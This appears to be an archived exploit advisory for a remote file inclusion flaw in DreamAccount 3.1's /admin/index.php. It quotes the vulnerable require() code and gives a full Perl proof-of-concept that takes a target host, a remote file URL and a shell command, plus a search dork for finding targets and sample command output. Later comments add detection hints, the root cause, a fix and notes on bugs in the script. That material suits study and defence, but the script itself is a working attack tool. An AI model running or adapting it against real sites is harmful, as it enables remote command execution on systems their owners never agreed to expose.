----------------------------------------------------
DREAMACCOUNT V3.1 Command Execution Exploit
----------------------------------------------------
Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
Coded By Drago84(Exclusive Security Team)
----------------------------------------------------
site of script:http://dreamcost.com
----------------------------------------------------
Vulnerable: DREAMACCOUNT V3.1
----------------------------------------------------
vulnerable file :
------------------
/admin/index.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require($path . "setup.php");
require($path . "functions.php");
require($path . "payment_processing.inc.php");
$path parameter File inclusion
----------------------------------------------------
#!/usr/bin/perl
# Proof-of-concept for the $path remote file inclusion in DreamAccount 3.1
# /admin/index.php (see the vulnerable code quoted above).  It sends one GET
# request to that page with a caller-supplied `path` value and prints whatever
# the response body contains between the markers "Exclusive" and "/Exclusive".
#
# Defender notes:
#   - Detection: the request produced below is a GET to /admin/index.php whose
#     `path` parameter is an absolute URL followed by a literal "?", plus a
#     `cmd` parameter.  A `path=` value that is a URL is never legitimate for
#     this page; alert on it in web-server / WAF logs.
#   - Root cause: $path is concatenated straight into require(), so the
#     trailing "?" turns the appended file name into a query string of the
#     remote URL.  The application-side fix is to never build include paths
#     from request input (allow-list the include directory; keep PHP's
#     allow_url_include off).
#   - Code quality: no `use strict; use warnings;`, and see the printf note
#     near the end.
use HTTP::Request;
use LWP::UserAgent;
# Banner.
print "\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print "=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use \n";
print " Into the Eval Site it must be:\n\n";
# The remote file is expected to wrap its output in these two markers; the
# regex further down extracts the text between them.
print " Exclusive /Exclusive";
# Four positional arguments are required: host, app directory, remote file
# URL, command.  Otherwise print usage and exit.
if (@ARGV < 4) {
    print "\n\n[*] usage: perl dream.pl \n";
    print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";
    print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
    exit();
}
my $dir=$ARGV[1];     # application directory on the target, e.g. /dreamaccount/
my $host=$ARGV[0];    # target host; the usage example passes it without a scheme
my $eval=$ARGV[2];    # URL of the remote file to be supplied as `path`
my $cmd=$ARGV[3];     # value passed through as the `cmd` query parameter
# Request URL: <host><dir>/admin/index.php?path=<eval>?&cmd=<cmd>
# NOTE(review): $host is used verbatim, so following the usage example the
# URL has no "http://" prefix -- presumably LWP rejects that as a non-absolute
# URL; not verified here.
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);                   # give up on the request after 10 seconds
my $response=$ua->request($req);
# Only a 2xx response is inspected; any failure (timeout, 4xx/5xx) is silent.
if ($response->is_success) {
    print "\n\nResult of:".$cmd."\n";
    # Capture the text between "Exclusive" and "/Exclusive".  With /s the
    # greedy .+ spans newlines, so the capture runs to the LAST "/Exclusive".
    my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
    # BUG: $pezzo_utile is never used; $1 is printed instead, and as printf's
    # FORMAT string, so any "%" in the captured text is interpreted as a
    # conversion and the output is garbled.  If the regex did not match, $1 is
    # undef here (there is no earlier successful match) and nothing is printed.
    printf $1;
    $response->content;             # no-op: method call in void context, result discarded
    print "\n";
}
----------------------------------------------------------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Coded By Drago84
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER ,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member